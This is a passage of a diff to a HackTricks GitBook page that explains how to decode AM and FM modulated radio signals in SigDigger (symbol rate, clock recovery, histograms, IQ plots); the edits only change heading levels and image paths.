 Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
 
@@ -143,7 +142,7 @@ Pressing sample this appears:
 
 Now, to make SigDigger understand **where is the range** of the level carrying information you need to click on the **lower level** and maintain clicked until the biggest level:
 
-![](<../../.gitbook/assets/image (662) (1) (1).png>)
+![](<../../.gitbook/assets/image (662) (1) (1) (1).png>)
 
 If there would have been for example **4 different levels of amplitude**, you should have need to configure the **Bits per symbol to 2** and select from the smallest to the biggest.
 
@@ -155,13 +154,13 @@ If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no
 
 Also, use **codifications** such as **Manchester**, and **up+down** can be **1 or 0** and an down+up can be a 1 or 0. In those cases you need to **treat the obtained ups (1) and downs (0)** to substitute the pairs of 01 or 10 as 0s or 1s.
 
-# FM Example
+## FM Example
 
 {% file src="../../.gitbook/assets/sigdigger_20220308_170858Z_2560000_433500000_float32_iq.raw" %}
 
-## Uncovering FM
+### Uncovering FM
 
-### Checking the frequencies and waveform
+#### Checking the frequencies and waveform
 
 Signal example sending information modulated in FM:
 
@@ -181,7 +180,7 @@ If the synchronized frequency is **closer to one frequency than to the other** y
 
 ![](<../../.gitbook/assets/image (634).png>)
 
-### Checking the histogram
+#### Checking the histogram
 
 Checking the frequency histogram of the signal with information you can easily see 2 different signals:
 
@@ -195,7 +194,7 @@ And this is would be phase histogram (which makes very clear the signal is not m
 
 ![](<../../.gitbook/assets/image (201) (2).png>)
 
-### With IQ
+#### With IQ
 
 IQ doesn't have a field to identify frequencies (distance to centre is amplitude and angle is phase).\
 Therefore, to identify FM, you should **only see basically a circle** in this graph.\
@@ -203,15 +202,14 @@ Moreover, a different frequency is "represented" by the IQ graph by a **speed ac
 
 ![](<../../.gitbook/assets/image (643) (1).png>)
 
-## Get Symbol Rate
+### Get Symbol Rate
 
 You can use the **same technique as the one used in the AM example** to get the symbol rate once you have found the frequencies carrying symbols.
 
-## Get Bits
+### Get Bits
 
 You can use the **same technique as the one used in the AM example** to get the bits once you have **found the signal is modulated in frequency** and the **symbol rate**.
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -227,5 +225,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-